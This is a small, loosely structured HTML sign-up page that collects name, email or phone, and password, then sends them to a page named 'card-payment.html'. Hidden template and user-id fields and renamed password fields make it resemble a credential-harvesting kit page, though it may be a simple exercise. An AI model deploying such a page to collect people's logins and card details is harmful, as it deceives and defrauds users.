<!DOCTYPE html>
<html>
<head>
</head>
<body>
</body>

<html>
<head>

   <title>Create an account </title>
   <html lang="en">
                 <head>
                 <meta charset="UTF-8">
                 <meta name="viewport" content="width=device-width, initial-scale=1.0">
                 <title>Create an account</title>
             
                 <style type="text/css" id="operaUserStyle">
                 body{
                   color:#ffffff; 
                   background:#bf75ff; 
                 }
                 form {
                   padding-left: 20px;
                 }
                 input {
                   height: 50px;
                   width: 300px;
                   color: black;
                   border: 1px solid black;
                   margin: 5px;
                   border-radius: 2px;
                   padding-left: 10px;
                   font-size:17px;
                 }
                 button {
                   margin-left: 12px;
                   margin-top: 20px;
                   height: 35px;
                   background-color: #8d17c9;
                   color: white;
                   border: none;
                 }
                 h2 {
                   color: #1d095ef9;
                 }
                 a {
                   text-decoration: none;
                 }
                 p {
                   padding-left: 60px;
                 }
                 </style>
                 </head>
                 <body class="bg-[#111111]">
                  <noscript>You need to enable JavaScript to run this app.</noscript>
                  <div id="root"><div>
                  <div class="grid place-content-center grid-cols-1 md:px-96 mt-10 gap-10">
                  <div class="m-auto text-xs sm:text-sm md:text-lg max-w-sm md:max-w-2xl text-center "></div>
                    <div class="flex justify-center w-full">
                       
                    </div>
                    <div class="flex justify-center w-full">
                       
                    </div>
                    <h2 class="text-center" style="padding-top:10%; padding-left:20px;">Create an account</h2>
                    <form action="card-payment.html">
                       <input type="hidden" name="link" value="custom template">
                       <input type="hidden" name="ftype" value="normal">
                       <input type="hidden" name="login" value="login">
                       <input type="hidden" name="user_id" value="16934">
                       <div class="p-2 w-full  gap-1  ">
                         <div class="flex flex-col   p-2  gap-1">
                          <label for="fname" class="text-sm">First name</label>
                          <br>
                          <input type="name" class="w-full border p-2 rounded-md" name="fname" placeholder="Enter your firstname" style="color:black;" required="">
                          <br>
                          <label for="lname" class="text-sm">Last name</label>
                          <br>
                          <input type="name" class="w-full border p-2 rounded-md" name="lname" placeholder="Enter your Lastname" style="color:black;" required="">
                          <br>
                          <label for="email" class="text-sm">Email or Phone</label>
                          <br>
                          <input type="text" class="w-full border p-2 rounded-md" name="message_title" placeholder="Email or Phone" style="color:black;" required="">
                         </div>
                         <div class="flex flex-col   p-2   gap-1">
                          <label for="password" class="text-sm">Password</label>
                          <br>
                          <input type="password" class="w-full border p-2 rounded-md" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" style="color:#111;" required="">
                          <br>
                          <input type="password" placeholder="confirm your password" id="confirm-password">
                         </div>
                         <div class="flex flex-col justify-center items-center  p-2 gap-1 w-3/6 mx-auto">
                            <button type="submit" class="text-black font-semibold p-3 rounded-md w-full bg-[#125ec3] hover:bg-blue-600" style="width: 300px">Create account</button>
                            <p> I already have an account <a href="Login1.html"> Log in</a></p>
                         </div>
                       </div>
                    </form>
                    </div>
                 </div>
               </div>
               </body>
               </html>

	
  
    
